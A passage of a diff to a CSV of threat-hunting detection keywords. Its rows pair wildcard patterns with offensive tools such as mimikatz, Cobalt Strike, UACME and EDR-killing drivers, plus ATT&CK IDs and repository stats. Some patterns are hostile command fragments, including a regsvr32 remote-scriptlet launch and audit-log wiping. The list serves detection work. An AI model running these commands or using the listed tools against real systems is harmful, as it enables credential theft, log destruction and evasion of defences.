execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*<3 eo.oe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*<3 eo.oe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "**","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" -"*== NoPowerShell v* ==*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*== NoPowerShell v* ==*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*=Administrator.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*=imaohw*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*=resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*> /var/log/audit/audit.log* rm -f .*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*0.0.0.0:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*0.0.0.0:4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*0.0.0.0:4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*0.0.0.0:4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*0.0.0.0:4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*0.0.0.0:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" -"*00_create_all_modules_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*00_create_all_modules_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*01_all_exploits_have_payloads_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*01_all_exploits_have_payloads_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*0472A393-9503-491D-B6DA-FA47CD567EDE*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" -"*04845492-BD9E-4EC6-ACA4-4A0A460B3508*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*04845492-BD9E-4EC6-ACA4-4A0A460B3508*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*04ca7e137e1e9feead96a7df45bb67d5ab3de190*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*04FC654C-D89A-44F9-9E34-6D95CE152E9D*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" -"*07EF7652-1C2D-478B-BB4B-F9560695A387*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*07EF7652-1C2D-478B-BB4B-F9560695A387*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" @@ -6611,16 +6754,16 @@ "*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*0ac82760-3e0d-4124-bd1c-92c8dab97171*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*0B6D8B01-861E-4CAF-B1C9-6670884381DB*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" -"*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*0d1n * --post * --payloads *","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","","N/A","","","" "*0d1n --host*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","","N/A","","","" "*0d1n*kill_listener.sh*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*0DD419E5-D7B3-4360-874E-5838A7519355*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - 